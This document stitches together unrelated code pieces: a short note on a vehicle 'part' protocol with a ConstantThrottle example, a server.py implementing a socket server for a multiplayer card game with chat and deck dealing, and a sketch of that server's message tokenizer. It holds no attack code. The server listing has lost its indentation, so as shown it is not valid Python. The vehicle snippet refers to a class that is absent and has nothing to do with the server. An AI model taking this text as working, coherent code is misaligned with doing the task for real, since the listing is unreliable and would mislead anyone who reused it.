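Vehicle.add and update_parts above define an implicit part protocol: a part exposes run() (or run_threaded() plus a looping update() when threaded=True) and shutdown(). A minimal, hypothetical part wired into a vehicle, assuming the Vehicle class above and a Memory.put that accepts a single-channel list:

class ConstantThrottle:
    '''Hypothetical part: emits a fixed throttle value each loop.'''
    def __init__(self, value=0.3):
        self.value = value

    def run(self):
        return self.value  # written to the 'throttle' channel by the drive loop

    def shutdown(self):
        pass

v = Vehicle()
v.add(ConstantThrottle(), outputs=['throttle'])
v.start(rate_hz=20, max_loop_count=5)  # run five loops, then stop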
server.py
|
import socket
import threading
import select
import time
from message import Message
from instructions import Instruction
from cards import Deck
class Server:
MAX_CONCURRENT_REQUESTS = 4
UPDATE_FREQUENCY = 1000
SEND_RATE = 50
class Flags:
SHUTDOWN_SERVER = 1
def __init__(self, address, verbose=True):
self.ip, self.port = address
self.verbose = verbose
self.sock = self.setup_socket()
self.__flags = 0
self.__inst_queue = []
self.__client_sockets = []
self.__client_info = {}
self.__client_send_queue = {}
self.__game_running = False
self.__curr_client_id = 0
self.__decks = []
def setup_socket(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self.ip, self.port))
if self.verbose:
print(f"Set up socket on {self.ip}:{self.port}.")
return s
def start_server(self):
self.sock.listen(Server.MAX_CONCURRENT_REQUESTS)
if self.verbose:
print("Starting server...")
self.__inst_queue.append(lambda: print("Server started successfully."))
listen_t = threading.Thread(target=self.listen, daemon=True)
console_t = threading.Thread(target=self.console, daemon=True)
listen_t.start()
console_t.start()
self.run()
if self.verbose:
print("Shutting down server...")
self.sock.close()
listen_t.join(1)
console_t.join(0.1)
if self.verbose:
print("Server shut down successfully.")
def run(self):
while not self.__flags & Server.Flags.SHUTDOWN_SERVER:
while self.__inst_queue:
self.__inst_queue.pop(0)()
self.handle_client_channels()
def listen(self):
while not self.__flags & Server.Flags.SHUTDOWN_SERVER:
try:
client_socket, address = self.sock.accept()
except socket.timeout:
pass
except Exception as e:
raise e
else:
                # bind the current socket/address as defaults so a later accept
                # cannot rebind them before the queued instruction runs
                self.__inst_queue.append(lambda cs=client_socket, addr=address: self.accept_new_client(cs, addr))
def accept_new_client(self, client_socket, address):
if self.verbose:
print(f"Connection from {':'.join(map(str, address))}")
if self.__game_running:
print("Rejecting client; game already running.")
client_socket.sendall(Message.new_send_message(Instruction.Update.GAME_RUNNING.encode("utf-8")).encode())
client_socket.close()
return
self.__client_sockets.append(client_socket)
self.__client_info[client_socket.getpeername()] = {"id": self.__curr_client_id}
self.__client_send_queue[client_socket.getpeername()] = []
self.__curr_client_id += 1
def handle_client_channels(self):
# read any incoming requests from the clients
read_sockets, _, _ = select.select(self.__client_sockets, [], [], 1 / Server.UPDATE_FREQUENCY)
for s in read_sockets:
message = Message.new_recv_message()
buffer = s.recv(Message.BUFFER_SIZE)
if not buffer:
if self.verbose:
print(f"{s.getpeername()[0]} disconnected.")
self.__client_sockets.remove(s)
del self.__client_send_queue[s.getpeername()]
continue
while not message.decode(buffer):
buffer = s.recv(Message.BUFFER_SIZE)
self.decode_instruction(s.getpeername(), message.message.decode("utf-8"))
# send any outgoing messages to the clients
for s in self.__client_sockets:
while self.__client_send_queue[s.getpeername()]:
message = self.__client_send_queue[s.getpeername()].pop(0)
s.sendall(message.encode())
# if self.__client_send_queue[s.getpeername()]:
# time.sleep(1.0 / Server.SEND_RATE)
def decode_instruction(self, client, message):
operands = []
if ":" in message:
instruction, operand = message.split(":", 1)
in_string = False
cur_operand = ""
for c in operand:
if c == "'":
in_string = not in_string
else:
if in_string:
cur_operand += c
elif c == ":":
operands.append(cur_operand)
cur_operand = ""
operands.append(cur_operand)
else:
instruction = message
if instruction == Instruction.SET_PROPERTY:
assert len(operands) == 2
self.__client_info[client][operands[0]] = operands[1]
if operands[0] == "name":
player_joined_message = Message.new_send_message(
f"{Instruction.Update.PLAYER_JOINED}:'{operands[1]}'".encode("utf-8")
)
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(player_joined_message)
if instruction == Instruction.Game.PICKUP_CARD:
assert len(operands) == 1
pickup_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(pickup_message)
if instruction == Instruction.Game.PLACE_CARD:
assert len(operands) == 2
src_deck = self.__decks[int(operands[0])]
dst_deck = self.__decks[int(operands[1])]
dst_deck.add_card_to_top(src_deck.take_top())
place_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(place_message)
if instruction == Instruction.Game.MOVE_ENDED:
ended_message = Message.new_send_message(Instruction.Game.MOVE_ENDED.encode("utf-8"))
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(ended_message)
if instruction == Instruction.Game.CALL_MONGOOSE:
mongoose_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
self.__client_send_queue[c].append(mongoose_message)
if instruction == Instruction.Update.CHAT_MESSAGE:
chat_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
self.__client_send_queue[c].append(chat_message)
if instruction == Instruction.Game.FLIP_DECK:
flip_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
self.__client_send_queue[c].append(flip_message)
if instruction == Instruction.Update.QUIT_GAME:
if self.verbose:
print(f"Player {self.__client_info[client]['name']} left the game.")
del self.__client_info[client]
def console(self):
while not self.__flags & Server.Flags.SHUTDOWN_SERVER:
i = input()
if i.lower() in ("q", "quit", "shutdown"):
self.__flags |= Server.Flags.SHUTDOWN_SERVER
self.__inst_queue.append(lambda: print(f"Shutting down server..."))
elif i.lower() in ("h", "help"):
self.__inst_queue.append(Server.help)
elif i.lower() in ("s", "start"):
self.__inst_queue.append(self.start_game)
def start_game(self):
curr_id = 0
for c in self.__client_info:
self.__client_info[c]["id"] = curr_id
curr_id += 1
p_names = [f"'{self.__client_info[c]['name']}':'{self.__client_info[c]['id']}'" for c in self.__client_info]
game_deck = Deck.full()
game_deck.shuffle()
suit_map = {"Spades": "0", "Diamonds": "1", "Clubs": "2", "Hearts": "3"}
deck_str = ":".join([f"'{suit_map[card.suit]}-{card.value}'" for card in game_deck.cards])
send_deck = f"{Instruction.Game.SEND_DECK}:{deck_str}"
for c in self.__client_sockets:
self.__client_send_queue[c.getpeername()].append(Message.new_send_message(send_deck.encode("utf-8")))
c_id = self.__client_info[c.getpeername()]["id"]
message_text = Instruction.START_GAME + f":'{c_id}':" + ":".join(p_names)
message = Message.new_send_message(message_text.encode("utf-8"))
self.__client_send_queue[c.getpeername()].append(message)
player_decks = game_deck.deal(len(self.__client_sockets))
        # set up the decks in the order of the players' IDs
for d in player_decks:
self.__decks.append(d)
self.__decks.append(Deck.empty())
for i in range(4):
self.__decks.append(Deck.empty())
self.__inst_queue.append(lambda: print(f"Starting game with: {', '.join(p_names)}"))
self.__game_running = True
@staticmethod
def help():
print("q, quit, shutdown - Shutdown the server")
print("s, start - Start the game")
print("h, help - Show the help message")
def stop_server(self):
self.sock.close()
def main():
# this user has run the server script directly, so they are intending to host
ip = input("Enter host IP> ")
port = int(input("Enter host port> "))
server = Server((ip, port))
server.start_server()
if __name__ == "__main__":
main()
|
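decode_instruction above parses messages of the form INSTRUCTION:'operand':'operand', where the single quotes let operands safely contain ':'. A standalone sketch of just that tokenizer:

def split_instruction(message):
    if ':' not in message:
        return message, []
    instruction, operand = message.split(':', 1)
    operands, cur, in_string = [], '', False
    for c in operand:
        if c == "'":
            in_string = not in_string
        elif in_string:
            cur += c
        elif c == ':':
            operands.append(cur)
            cur = ''
    operands.append(cur)
    return instruction, operands

print(split_instruction("SET_PROPERTY:'name':'alice'"))  # ('SET_PROPERTY', ['name', 'alice'])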